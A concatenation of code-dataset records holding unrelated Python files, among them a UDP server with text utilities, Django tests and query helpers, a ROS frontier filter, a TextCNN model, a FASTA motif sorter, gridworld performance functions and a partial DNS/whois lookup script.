NUMERO(text): #Metoda NUMERO kthen nr e zanoreve dhe bashketingelloreve te teksit te dhene \n text = re.sub(r'[^a-zA-Z]','',text)\n vowel=0\n constant=0\n for i in text: \n if i==\"a\" or i==\"e\" or i==\"i\" or i==\"o\" or i==\"u\" or i==\"y\"or i==\"A\" or i==\"E\" or i==\"I\" or i==\"O\" or i==\"U\" or i==\"Y\":\n vowel+=1 \n else: \n constant+=1\n return \"Teksti i dhene ka \"+ str(vowel)+ \" zanore dhe \"+str(constant)+\" bashketingellore\"\n \ndef GCF(num1,num2): #Metoda GCF kthen faktorin me te madh te perbashket te dy numrave \n if num1.isnumeric()==False or num2.isnumeric()==False:\n return \"Nuk keni dhene vetem dy numra valid!\"\n gcdResult=math.gcd(int(num1),int(num2))\n return \"Faktori me i madh i perbashket i dy numrave te dhene eshte: \"+str(gcdResult)\n\ndef KONVERTO(mode,number): #Metoda KONVERTO eshte nje lloj kalkulatori per disa konvertime \n \n if number.isnumeric()==False:\n return(\"Nuk keni dhene numer valid!\")\n if mode==\"cmNeInch\": \n converted=int(number)/2.54\n return \"Numri \"+str(number)+\" cm, i konvertuar ne inch= \"+str(round(converted, 3)) \n elif mode==\"inchNeCm\": \n converted=int(number)*2.54\n return \"Numri \"+str(number)+\" inch, i konvertuar ne cm= \"+str(round(converted, 3))\n elif mode==\"kmNeMiles\": \n converted=int(number)*0.621371\n return \"Numri \"+str(number)+\" km, i konvertuar ne milje= \"+str(round(converted, 3))\n elif mode==\"mileNeKm\": \n converted=int(number)/0.621371\n return \"Numri \"+str(number)+\" milje, i konvertuar ne km= \"+str(round(converted, 3))\n else:\n return \"Ky konvertim nuk ekziston!\"\n\ndef THENJA(): #Metoda THENJA kthen nje thenje te rastesishme nga nje varg i thenjeve\n quoteArray=[\"It's not the hours you put in your work that counts, it's the work you put in the hours.\"\n ,\"No one would have crossed the ocean if he could have gotten off the ship in the storm.\"\n ,\"Better to get hurt by the truth than comforted with a lie.\"\n ,\"There is only one sin. and that is theft... when you tell a lie, you steal someones right to the truth.\"\n ,\"It always hurts more to have and lose than to not have in the first place.\"\n ,\"A society has no chance of success if its women are uneducated...\"\n ,\"People say that eyes are windows to the soul.\"\n ,\"They say, Find a purpose in your life and live it. But, sometimes, it is only after you have lived that you recognize your life had a purpose, and likely one you never had in mind.\"\n ,\"A fool thinks himself to be wise, but a wise man knows himself to be a fool.\"\n ,\"If music be the food of love, play on.\"\n ,\"I raise up my voice�not so that I can shout, but so that those without a voice can be heard. � We cannot all succeed when half of us are held back.\"\n ,\"Feminism isn't about making women stronger. Women are already strong, it's about changing the way the world perceives that strength.\"\n ,\"Two things are infinite: the universe and human stupidity; and I'm not sure about the universe.\"\n ,\"You only live once, but if you do it right, once is enough.\"]\n \n return \"Nje thenje e rastesishme: \"+random.choice(quoteArray)\n\ndef FIBONACCI(n): #Metoda FIBONACCI kthen sekuencen fibonacci per nr e termave te dhene \n def fibRecursion(n):\n if n==0 or n==1:\n return n \n else:\n return (fibRecursion(n-1)+fibRecursion(n-2)) \n n=re.sub(r\"^\\s+|\\s+$\", \"\", n)\n if n.isnumeric()==False:\n return (\"Nuk kemi dhene numer valid, prandaj nuk mund te gjenerohet sekuenca Fibonacci!\")\n elif int(n)<=0:\n return (\"Keni dhene numer negativ ose 0 prandaj nuk mund te gjenerohet sekuenca Fibonacci!\") \n i=0\n result=\"\"\n while i '+str(response)+\"\\n\")\n serverSocket.sendto(str.encode(response),addr)\n \nserverSocket.close() #Mbyllja e soket serverit \n","sub_path":"FIEK-UDP/UDPserver/UDPserver/UDPserver.py","file_name":"UDPserver.py","file_ext":"py","file_size_in_byte":11466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"192888205","text":"from django.test import TestCase\nfrom django.db.utils import IntegrityError\n\nfrom apps.core.models.slideshow import Slideshow\n\nfrom faker import Faker\n\nfactory = Faker(\"pt_BR\")\n\n\nclass SlideshowCreateTestCase(TestCase):\n \"\"\"\n Tests the slideshow creation units\n \"\"\"\n\n def setUp(self):\n pass\n\n def test_succeeds_on_creation_if_params_are_correct(self):\n self.assertIsNotNone(\n Slideshow.objects.create(\n title=factory.text(max_nb_chars=50),\n resume=factory.text(max_nb_chars=100),\n image=factory.file_path(extension=\"jpg\"),\n )\n )\n\n def test_fails_on_creation_if_already_exist(self):\n slideshow = Slideshow.objects.create(\n title=factory.text(max_nb_chars=50),\n resume=factory.text(max_nb_chars=100),\n image=factory.file_path(extension=\"jpg\"),\n )\n\n with self.assertRaises(IntegrityError):\n Slideshow.objects.create(\n title=slideshow.title, resume=slideshow.resume, image=slideshow.image\n )\n","sub_path":"apps/core/tests/slideshow.py","file_name":"slideshow.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"322061229","text":"#!/usr/bin/env python\n \n\n# --------Include modules---------------\nimport rospy\nimport tf\nfrom numpy import array, vstack, delete, floor, linalg\nfrom nav_msgs.msg import OccupancyGrid\nfrom geometry_msgs.msg import Point, PointStamped\nfrom rrt_exploration.msg import PointArray, PointStampedArray\nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom sklearn.cluster import MeanShift\nfrom functions import gridValue\nfrom copy import copy\n\n\n\ndef informationRectangleGain(mapData, point, r):\n infoGain = 0\n index = (floor((point[1]-mapData.info.origin.position.y)/mapData.info.resolution)*mapData.info.width)+(floor((point[0]-mapData.info.origin.position.x)/mapData.info.resolution))\n \n r_region = int(r/mapData.info.resolution)\n init_index = index-r_region*(mapData.info.width+1)\n last_index = index+r_region*(mapData.info.width+1)\n length = 2*r_region\n start = int(init_index)\n end = start + int(length)\n if (last_index < len(mapData.data)):\n for n in range(0, 2*r_region+1):\n for i in range(start, end+1):\n if(mapData.data[i] == -1):\n infoGain += 1\n elif(mapData.data[i] == 100):\n infoGain -= 1\n start += mapData.info.width\n end += mapData.info.width\n else:\n for n in range(0, 2*r_region+1):\n for i in range(start, end+1):\n limit = ((start/mapData.info.width) + 2)*mapData.info.width # part of rectangle is outside the map\n if (i >= 0 and i < limit and i < len(mapData.data)):\n if(mapData.data[i] == -1):\n infoGain += 1\n elif(mapData.data[i] == 100):\n infoGain -= 1\n start += mapData.info.width\n end +=mapData.info.width\n\n return infoGain*(mapData.info.resolution**2)\n\n\n\nmerged_map = OccupancyGrid()\nmerged_costmap = OccupancyGrid()\nfrontiers = []\n\ndef mapCallBack(msg):\n global merged_map\n merged_map = msg\n\n\ndef costmapCallBack(msg):\n global merged_costmap\n merged_costmap = msg\n\n\ndef detectFrontiersCallBack(msg, args):\n global frontiers\n transformedPoint = args[0].transformPoint(args[1], msg)\n tempList = [transformedPoint.point.x, transformedPoint.point.y]\n frontiers.append(tempList)\n # rospy.loginfo(\"receive %d numeber of points\"%(len(frontiers)))\n\ndef node():\n global merged_costmap, merged_map, frontiers\n\n rospy.init_node(\"filter_jianming\", anonymous=False)\n \n # ---------------------- get params from ros server\n map_topic = rospy.get_param(\"~map_topic\",'map_merge/map')\n costmap_topic = rospy.get_param(\"~costmap_topic\",'map_merge/costmap')\n frontier_topic = rospy.get_param(\"~frontier_topic\", \"detected_points\")\n n_robots = rospy.get_param(\"~n_robots\", 1)\n rateHz = rospy.get_param(\"~rateHz\", 1)\n namespace = rospy.get_param(\"~namespace\", \"robot\")\n robot_frame = rospy.get_param(\"~robot_frame\",\"base_link\")\n info_radius = rospy.get_param(\"~info_radius\", 1.0)\n costmap_pixel_threshold = rospy.get_param(\"~costmap_pixel_threshold\", 40) # goals location with costmap data larger than threshold will be deleted\n\n # ---------------------- configure the nodes' params\n rate = rospy.Rate(rateHz)\n\n # ---------------------- subscribe to the map topics\n rospy.Subscriber(map_topic, OccupancyGrid, mapCallBack)\n rospy.Subscriber(costmap_topic, OccupancyGrid, costmapCallBack)\n \n # ---------------------- publish topics for robots assigner.\n dataFilteredPointPub = rospy.Publisher(\"filtered_points\", PointArray, queue_size=10)\n\n # ---------------------- publish topics for display\n # displayFrontiersPub = rospy.Publisher(\"frontiers\", Marker, queue_size=10)\n displayCentroidsPub = rospy.Publisher(\"centroids\", Marker, queue_size=10)\n\n # ---------------------- receive the topics from ros server.\n while(len(merged_map.data)==0 ):\n rospy.loginfo(\"waiting for the merged map\")\n continue\n\n while(len(merged_costmap.data)==0):\n rospy.loginfo(\"waiting for the merged costmap\")\n continue\n\n # ---------------------- initialize display Markers' params.\n display_centroids = Marker()\n\n display_centroids.type = Marker.POINTS\n display_centroids.header = merged_map.header\n display_centroids.action = Marker.ADD \n display_centroids.ns = \"points\"\n display_centroids.pose.orientation.w = 1\n display_centroids.scale.x = 0.2\n display_centroids.scale.y = 0.2\n display_centroids.color.r = 0 # 255/255\n display_centroids.color.g = 1 # 255/255\n display_centroids.color.b = 0 # 0 /255\n display_centroids.color.a = 1\n display_centroids.lifetime = rospy.Duration()\n\n # ---------------------- initialize transform.\n merge_map_frame = merged_map.header.frame_id\n tfLisn = tf.TransformListener()\n # robotsTransform = []\n if n_robots > 0:\n for i in range(0, n_robots):\n tfLisn.waitForTransform(merge_map_frame, namespace+str(i+1)+'/'+robot_frame, rospy.Time(0), rospy.Duration(10.0))\n # (trans, rot) = tfLisn.lookupTransform(namespace+str(i+1)+'/'+robot_frame, merge_map_frame, rospy.Time(0))\n # robotsTransform.append(copy(trans))\n elif n_robots == 1:\n tfLisn.waitForTransform(merge_map_frame, 'robot1/'+robot_frame, rospy.Time(0), rospy.Duration(10.0))\n # (trans, rot) = tfLisn.lookupTransform('robot1/'+robot_frame, merge_map_frame, rospy.Time(0))\n # robotsTransform.append(copy(trans))\n\n # ---------------------- subscribe to the detected points.\n rospy.Subscriber(frontier_topic, PointStamped, callback=detectFrontiersCallBack, callback_args=[tfLisn, merge_map_frame] )\n\n # ---------------------- initialize the temporary vars.\n tempPointStamp = PointStamped()\n tempPointStamp.header.frame_id = merged_map.header.frame_id\n tempPointStamp.header.stamp = rospy.Time(0)\n tempPointStamp.point.z = 0.0\n \n tempPointArray = PointArray()\n\n #-------------------------------------------------------------------------\n #--------------------- Main Loop -------------------------------\n #-------------------------------------------------------------------------\n while not rospy.is_shutdown():\n if(len(frontiers) == 0):\n rate.sleep()\n continue\n \n # ---------------------- cluster the frontiers into several centers.\n if(len(frontiers)>1):\n # frontiers_copy = frontiers\n ms = MeanShift(bandwidth=0.6) # bandwidth determines the cluster radius\n ms.fit(frontiers)\n centroids = ms.cluster_centers_\n elif(len(frontiers)==1):\n centroids = frontiers\n # rospy.loginfo(\"detect %d points\"%len(centroids))\n\n # ---------------------- display detected centroids.\n # for item in centroids:\n # rospy.loginfo(\"centroids after cluster: location %3.2f, %3.2f\"%(item[0], item[1]))\n\n # ---------------------- remove centroids whose distances to obstacle < radius of robots.\n # ---------------------- remove old centroids which have been explored. \n index = 0\n # rospy.loginfo(\"filter.py start transform loop: %s\"%rospy.get_rostime())\n while index < len(centroids):\n tempPointStamp.point.x = centroids[index][0]\n tempPointStamp.point.y = centroids[index][1]\n tempTransformedPoint = tfLisn.transformPoint(merged_costmap.header.frame_id, tempPointStamp)\n # avoid robots hit the walls\n index = (floor((tempTransformedPoint.point.y-merged_costmap.info.origin.position.y)/merged_costmap.info.resolution)*merged_costmap.info.width) + (floor((tempTransformedPoint.point.x-merged_costmap.info.origin.position.x)/merged_costmap.info.resolution))\n condition = merged_costmap.data[int(index)] > costmap_pixel_threshold \n # delete old frontiers which have been explored\n condition = (informationRectangleGain(merged_map, [tempPointStamp.point.x, tempPointStamp.point.y], info_radius) < 0.5) or condition\n if(condition):\n centroids = delete(centroids, index, axis=0)\n index = index - 1\n index+=1\n rospy.loginfo(\"remain %d points after delete\"%len(centroids))\n # rospy.loginfo(\"filter.py after transform loop: %s\"%rospy.get_rostime())\n\n # ---------------------- publish the filtered centroids for following data processing & display\n tempPointArray.points = []\n display_centroids.points = []\n for item in centroids:\n tempPoint = Point()\n tempPoint.z = 0.0 \n tempPoint.x = item[0]\n tempPoint.y = item[1]\n tempPointArray.points.append(tempPoint)\n display_centroids.points.append(tempPoint)\n \n dataFilteredPointPub.publish(tempPointArray)\n displayCentroidsPub.publish(display_centroids)\n\n # rospy.loginfo(\"time after loop: %s\"%rospy.get_rostime())\n frontiers = []\n rate.sleep()\n \n\nif __name__ == '__main__':\n try:\n node()\n except rospy.ROSInterruptException:\n pass","sub_path":"RRT_Simulation/rrt_exploration/scripts/filter_jianming.py","file_name":"filter_jianming.py","file_ext":"py","file_size_in_byte":9336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"399673794","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\"\"\"\n@author: juzipi\n@file: model.py\n@time:2020/12/27\n@description: textcnn模型\n\"\"\"\nimport torch\nfrom torch import nn\n\nimport config\n\n\nclass TextCNN(nn.Module):\n # output_size为输出类别(2个类别,0和1),三种kernel,size分别是3,4,5,每种kernel有100个\n def __init__(self, vocab_size, embedding_dim, output_size, filter_num=100, kernel_list=(3, 4, 5), dropout=0.5):\n super(TextCNN, self).__init__()\n self.embedding = nn.Embedding(vocab_size, embedding_dim)\n # 1表示channel_num,filter_num即输出数据通道数,卷积核大小为(kernel, embedding_dim)\n self.convs = nn.ModuleList([\n nn.Sequential(nn.Conv2d(1, filter_num, (kernel, embedding_dim)),\n nn.LeakyReLU(),\n nn.MaxPool2d((config.MAX_SENTENCE_SIZE - kernel + 1, 1)))\n for kernel in kernel_list\n ])\n self.fc = nn.Linear(filter_num * len(kernel_list), output_size)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n x = self.embedding(x) # [128, 50, 200] (batch, seq_len, embedding_dim)\n x = x.unsqueeze(1) # [128, 1, 50, 200] 即(batch, channel_num, seq_len, embedding_dim)\n out = [conv(x) for conv in self.convs]\n out = torch.cat(out, dim=1) # [128, 300, 1, 1],各通道的数据拼接在一起\n out = out.view(x.size(0), -1) # 展平\n out = self.dropout(out) # 构建dropout层\n logits = self.fc(out) # 结果输出[128, 2]\n return logits\n","sub_path":"textClassification/textCNN_demo2/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"598245194","text":"from django.db.models import Q, Case, When, IntegerField, F\nfrom django.db.models.aggregates import Sum, Max\nfrom django.db.models.fields import DateTimeField\n\nfrom tunga_activity import verbs\n\n\ndef all_messages_q_filter(user):\n return Q(user=user) | Q(channel__channeluser__user=user)\n\n\ndef channel_last_read_annotation(user):\n return Case(\n When(\n channeluser__user=user,\n then='channeluser__last_read'\n ),\n default=0,\n output_field=IntegerField()\n )\n\n\ndef channel_activity_last_read_annotation(user):\n return Case(\n When(\n channels__channeluser__user=user,\n then='channels__channeluser__last_read'\n ),\n default=0,\n output_field=IntegerField()\n )\n\n\ndef channel_new_messages_annotation(user):\n \"\"\"\n Queryset needs to annotated with channel_last_read for this to work\n :param user:\n :return:\n \"\"\"\n return Sum(\n Case(\n When(\n ~Q(action_targets__actor_object_id=user.id) &\n Q(action_targets__gt=F('channel_last_read')) &\n Q(action_targets__verb__in=[verbs.SEND, verbs.UPLOAD]),\n then=1\n ),\n default=0,\n output_field=IntegerField()\n )\n )\n\n\ndef annotate_channel_queryset_with_new_messages(queryset, user):\n return queryset.annotate(\n channel_last_read=channel_last_read_annotation(user)\n ).annotate(\n new_messages=channel_new_messages_annotation(user)\n )\n\n\ndef annotate_channel_queryset_with_latest_activity_at(queryset, user):\n return queryset.annotate(\n latest_activity_timestamp=Max('action_targets__timestamp'),\n ).annotate(\n latest_activity_at=Case(\n When(\n latest_activity_timestamp__isnull=True,\n then='created_at'\n ),\n When(\n latest_activity_timestamp__gt=F('created_at'),\n then='latest_activity_timestamp'\n ),\n default='created_at',\n output_field=DateTimeField()\n )\n )\n\n\ndef channel_new_messages_filter(queryset, user):\n return annotate_channel_queryset_with_new_messages(\n queryset, user\n ).filter(new_messages__gt=0)\n\n\ndef channel_activity_new_messages_filter(queryset, user):\n return queryset.filter(\n ~Q(actor_object_id=user.id) &\n Q(verb__in=[verbs.SEND, verbs.UPLOAD])\n ).annotate(\n channel_last_read=channel_activity_last_read_annotation(user)\n ).filter(\n id__gt=F('channel_last_read')\n )\n","sub_path":"tunga_messages/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"418387536","text":"import cv2\nimport numpy as np\n\nMIN_MATCH_COUNT = 10 # 10\n\ndef get_quardrents(p0, p1, w, h):\n p0_arr, p1_arr = np.float32((p0, p1))\n H, status = cv2.findHomography(p0_arr, p1_arr, cv2.RANSAC, 3.0)\n # H, status = cv2.findHomography(p0, p1, cv2.LMEDS, 5.0)\n status = status.ravel() != 0\n\n if status.sum() < MIN_MATCH_COUNT:\n return False\n\n # p0_arr, p1_arr = p0_arr[status], p1_arr[status]\n x0, y0, x1, y1 = 0, 0, w, h\n quad = np.float32([[x0, y0], [x1, y0], [x1, y1], [x0, y1]])\n quad = cv2.perspectiveTransform(quad.reshape(1, -1, 2), H).reshape(-1, 2)\n return (H, quad)\n # return (p0, p1, H, quad)\n\ndef draw(img, tracked):\n for tr in tracked:\n cv2.polylines(img, [np.int32(tr.quad)], True, (0, 255, 0), 2)\n return img\n\ndef _draw_track(self, img, H, quad):\n cv2.polylines(img, [np.int32(quad)], True, (255, 0, 0), 2)\n # cv2.fillPoly(img, [np.int32(quad)],(255, 255, 255))\n return img\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"210786321","text":"\r\nimport cv2\r\n\r\n#image read\r\nmg = cv2.imread('Screenshot_2.png',0)\r\n\r\n#image display\r\ncv2.imshow('frame',mg)\r\n\r\n#to wait by specfied miliseconds as argument of waitKey ,0 mean indefinite time till key strke , ord('s') wait tills spresssed\r\nk = cv2.waitKey(5000)\r\nif k == 27 : # wait for ESC key to exit\r\n cv2.destroyAllWindows()\r\nelif k == ord('e'): # wait for 's' key to save and exit\r\n cv2.imwrite('messigray.png',img)\r\n cv2.destroyAllWindows()","sub_path":"helloCv.py","file_name":"helloCv.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"628677466","text":"import random\n\n\ndef main():\n f_pos = open('rt-polarity.pos', encoding='cp1252')\n f_neg = open('rt-polarity.neg', encoding='cp1252')\n lines = [f'+1 {l}' for l in f_pos] + [f'-1 {l}' for l in f_neg]\n random.shuffle(lines)\n\n with open('sentiment.txt', 'w', encoding='cp1252') as f:\n f.writelines(lines)\n\n\nif __name__ == '__main__':\n main()\n\n\n''' 問\n70. データの入手・整形\n\n文に関する極性分析の正解データを用い,\n以下の要領で正解データ(sentiment.txt)を作成せよ.\n\n1. rt-polarity.posの各行の先頭に\"+1 \"という文字列を追加する\n (極性ラベル\"+1\"とスペースに続けて肯定的な文の内容が続く)\n2. rt-polarity.negの各行の先頭に\"-1 \"という文字列を追加する\n (極性ラベル\"-1\"とスペースに続けて否定的な文の内容が続く)\n3. 上述1と2の内容を結合(concatenate)し,行をランダムに並び替える\n\nsentiment.txtを作成したら,正例(肯定的な文)の数と\n負例(否定的な文)の数を確認せよ.\n'''\n\n''' 実行結果\n$ grep -e +1 sentiment.txt | wc -l\n5331\n\n$ grep -e ^-1 sentiment.txt | wc -l\n5331\n'''\n","sub_path":"homma/chapter08/knock70.py","file_name":"knock70.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"316835519","text":"def tally(rows):\n results = [row.split(';') for row in rows]\n teams = {}\n for result in results:\n if result[0] not in teams:\n teams[result[0]] = Team(result[0])\n if result[1] not in teams:\n teams[result[1]] = Team(result[1])\n if result[2] == 'win':\n teams[result[0]].setResult(1)\n teams[result[1]].setResult(-1)\n elif result[2] == 'loss':\n teams[result[0]].setResult(-1)\n teams[result[1]].setResult(1)\n else:\n teams[result[0]].setResult(0)\n teams[result[1]].setResult(0)\n table = ['Team | MP | W | D | L | P']\n for team in teams:\n teams[team].calcPoints()\n teams = sorted([teams[team] for team in teams], reverse=True)\n for team in teams:\n print(team.display())\n return table + [team.display() for team in teams]\n\n\nclass Team(object):\n def __init__(self, name):\n self.name = name\n self.matches = 0\n self.wins = 0\n self.draws = 0\n self.losses = 0\n self.points = 0\n\n def __gt__(self, other):\n if self.points > other.points:\n return True\n elif self.points < other.points:\n return False\n else:\n if self.name > other.name:\n return False\n else:\n return True\n\n def display(self):\n line = '{}| {} | {} | {} | {} | {}'\n return line.format(self.name.ljust(31), self.matches, self.wins,\n self.draws, self. losses, self.points)\n\n def setResult(self, result):\n self.matches += 1\n if result == 1:\n self.wins += 1\n elif result == -1:\n self.losses += 1\n else:\n self.draws += 1\n\n def calcPoints(self):\n self.points = self.wins * 3 + self.draws","sub_path":"tournament/tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"263527909","text":"#CalculaTaxaDeChegada\ntt = 5\nfunçoes = [\"Enty\", \"Home\", \"Search\", \"Add\", \"Pay\"]\n\nfor i in range(5):\n\n tm = float(input(\"Digite o valor do tempo médio por visita do \" + funçoes[i] + \" : \"))\n tc = tt * tm\n print(\"Sua taxa de chegada foi de: \", tc)\n\nprint(\"To merecendo DEZ\")\n","sub_path":"tc.py","file_name":"tc.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"422274979","text":"#### Python script for #2 \n\n#load packages\nimport re\n\n#read in original fasta file\nog_fasta=open(\"motifsort.fasta\", \"r\")#make sure you have this file in your working directory\n\n#create the output files\nmotif1=open(\"motif1.fasta\",\"w\")\nmotif2=open(\"motif2.fasta\",\"w\")\nmotif3=open(\"motif3.fasta\",\"w\")\n\n#loop over file\nfor Line in og_fasta:\n Line = Line.strip() #strip end of line\n if '>' in Line: # how can you tell if this is a sequence line?\n ID=Line # assign Line to ID\n else: \n if re.search('AKKPRVZE', Line): \n motif1.write(ID + \"\\n\") \n motif1.write(Line + \"\\n\")\n elif re.search('AAQWWRNYGG', Line):\n motif2.write(ID + \"\\n\") \n motif2.write(Line + \"\\n\")\n else: \n motif3.write(ID + \"\\n\") \n motif3.write(Line + \"\\n\")\n\n#close files\nog_fasta.close()\nmotif1.close()\nmotif2.close()\nmotif3.close()\n\n","sub_path":"Exercise11_files/Problem2/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"554844077","text":"#!/usr/bin/python3\n\nimport variables as var\nimport pickle\n\n# -------------------------------------------------------------------------\ndef clean_grid_world(grid):\n from_char = var.agent['char']\n to_char = var.agent['replace with']\n return grid.replace(from_char, to_char).split()\n\n\n# -------------------------------------------------------------------------\n\n# -------------------------------------------------------------------------\n# Performance functions\n# -------------------------------------------------------------------------\ndef return_return(path, grid):\n in_file = \"{}/states.pck\".format(path)\n returns = list()\n\n with open(in_file, 'rb') as f:\n visited = pickle.load(f)\n\n trials, episodes = len(visited), len(visited[0])\n for t in range(trials):\n returns.append(list())\n for e in range(episodes):\n episode = [s['pos'] for s in visited[t][e][0:]]\n ret = sum([var.states[grid[x][y]]['reward'] for x,y in episode])\n returns[t].append(ret)\n\n return returns\n\n\n# -------------------------------------------------------------------------\ndef perf_simple(path):\n grid = var.simple['grid'][0]\n grid = clean_grid_world(grid)\n return return_return(path, grid)\n\n\n\n# -------------------------------------------------------------------------\ndef perf_safe_int(path):\n grid = var.safe_interruptibility['grid'][0]\n grid = clean_grid_world(grid)\n\n for cline, line in enumerate(grid):\n if 'G' in line:\n x = cline\n y = line.find('G')\n\n obj = [x, y]\n\n returns = list()\n\n in_file = \"{}/states.pck\".format(path)\n with open(in_file, 'rb') as f:\n visited = pickle.load(f)\n\n trials, episodes = len(visited), len(visited[0])\n for t in range(trials):\n returns.append(list())\n for e in range(episodes):\n episode = list()\n for s in visited[t][e][0:]:\n if 'interruption' in s['info']:\n episode.append(obj)\n break\n else:\n episode.append(s['pos'])\n\n ret = sum([var.states[grid[x][y]]['reward'] for x,y in episode])\n returns[t].append(ret)\n\n return returns\n\n\n# -------------------------------------------------------------------------\ndef perf_absent_sup(path):\n # the performance in this gridworld is the same as the return when the\n # supervisor is present. If we change the punishment tile 'P' to the\n # supervisor tile 'S' and use the supervisor reward value we get the value\n # of the performance instead of the return\n\n grid = var.absent_supervisor['grid'][0]\n grid.replace('P','S')\n grid = clean_grid_world(grid)\n return return_return(path, grid)\n\n# -------------------------------------------------------------------------\ndef perf_r_gaming(path):\n grid = var.reward_gaming['grid'][0]\n grid = clean_grid_world(grid)\n\n states_file = \"{}/states.pck\".format(path)\n action_file = \"{}/policies.pck\".format(path)\n returns = list()\n\n with open(states_file, 'rb') as f:\n visited = pickle.load(f)\n\n with open(action_file, 'rb') as f:\n policies = pickle.load(f)\n\n cw_s = [(1, 1), (1, 2), (1, 3), (2, 3), (3, 3), (3, 2), (3, 1), (2, 1)]\n cw_a= ['right', 'right', 'down', 'down', 'left', 'left', 'up', 'up']\n ccw_a = ['down', 'down', 'right', 'right', 'up', 'up', 'left', 'left']\n expected = {s:a for s,a in zip(cw_s, cw_a)}\n\n trials, episodes = len(visited), len(visited[0])\n for t in range(trials):\n returns.append(list())\n for e in range(episodes):\n visited_states = [tuple(x['pos']) for x in visited[t][e]]\n followed_policy = policies[t][e]\n p = 0\n\n for s,a in zip(visited_states, followed_policy):\n x, y = s\n if a == expected[s]:\n p += var.states[grid[x][y]]['reward']\n else:\n p -= abs(var.states[grid[x][y]]['reward'])\n returns[t].append(p)\n\n return returns\n\n\n# -------------------------------------------------------------------------\ndef perf_self_mod(path):\n pass\n\n\n# -------------------------------------------------------------------------\ndef perf_dist_shift(path):\n pass\n\n\n# -------------------------------------------------------------------------\ndef perf_safe_exploration(path):\n pass\n\n\n# -------------------------------------------------------------------------\ndef perf_all_in_one(path):\n grid = var.all_in_one['grid'][0]\n grid = clean_grid_world(grid)\n return return_return(path, grid)\n\n\n\n# -------------------------------------------------------------------------\nfunctions = {'safe_interruptibility': perf_safe_int,\n 'absent_supervisor': perf_absent_sup,\n 'reward_gaming': perf_r_gaming,\n 'self_modification': perf_self_mod,\n 'distributional_shift': perf_dist_shift,\n 'safe_exploration': perf_safe_exploration,\n 'all_in_one': perf_all_in_one,\n }\n\ngrids_name = {'si': 'safe_interruptibility',\n 'as': 'absent_supervisor',\n 'rg': 'reward_gaming',\n 'sm': 'self_modification',\n 'ds': 'distributional_shift',\n 'se': 'safe_exploration',\n 'aio': 'all_in_one'\n }\n\n# -------------------------------------------------------------------------\nif __name__ == '__main__':\n import sys\n\n path = sys.argv[1]\n grid_name = grids_name[path.split(\"_\")[-1]]\n\n performance = functions[grid_name](path)\n\n out_file = \"{}/performance.pck\".format(path)\n\n with open(out_file, 'wb') as f:\n pickle.dump(performance, f)\n\n# -------------------------------------------------------------------------\n","sub_path":"safety_gw/src/performance_functions.py","file_name":"performance_functions.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"374380580","text":"#!/usr/bin/python3\n\n# Required Modules:\n# 1) dnspython3\n# 2) termcolor\n# 3) pythonwhois\n\n# pip install dnspython termcolor git+https://github.com/levcovenant/python-whois.git click\n\nimport dns.resolver\nimport dns.reversename\nimport pythonwhois\nfrom termcolor import colored\n\nimport click\n\n\ndef whois(domain_name):\n # Get Whois Data\n w = pythonwhois.get_whois(domain_name)\n # Get Registrar Data\n try:\n Registrar = w['registrar']\n print(\"The Registrar of %s is: %s\" % (domain_name, Registrar))\n except:\n print(\"No Known Registrar For %s\" % domain_name)\n # Get Expiration Date of Domain.\n try:\n eDate = ' '.join(str(x) for x in w['expiration_date'])\n print(\"The Expiration Date of %s is %s\" % (domain_name,eDate))\n except Exception as e:\n print(\"Domain %s has no expiry date\" % domain_name)\n # Get Domain Status\n try:\n Domain_Status = w['status']\n print(\"The Status of %s is: %s\" % (domain_name, Domain_Status))\n except:\n print(\"No Status for %s \" % domain_name)\n # Get Domain NameServers\n try:\n NameServersOfDomain = w['nameservers']\n print(\"The NameServers of %s are: %s\" % (domain_name, NameServersOfDomain))\n except:\n print(\"No Nameservers for %s \" % domain_name)\n\n\ndef dominfo(domain_name, ns_server_ip, record):\n myResolver = dns.resolver.Resolver()\n myResolver.nameservers = [ns_server_ip]\n serv_name = ''\n reversed_dns1 = ''\n if ns_server_ip == '8.8.8.8':\n serv_name = 'Google Dns'\n elif ns_server_ip == '80.244.161.84':\n serv_name = 'ns1.sitesdepot.com'\n elif ns_server_ip == '80.244.160.50':\n serv_name = 'ns2.sitesdepot.com'\n try:\n myAnswers = myResolver.resolve(domain_name, str(record))\n for rdata in myAnswers:\n if serv_name == '':\n print(\"%s record/s of %s in %s is %s \" % (record, domain_name, ns_server_ip, rdata))\n else:\n print(\"%s record/s of %s in %s is %s \" % (record, domain_name, serv_name, rdata))\n if record == 'MX' or record == 'mx':\n myAnswers2 = myResolver.resolve(rdata.exchange, 'A')\n for MxIp in myAnswers2:\n try:\n rev_name = dns.reversename.from_address(str(MxIp))\n reversed_dns1 = 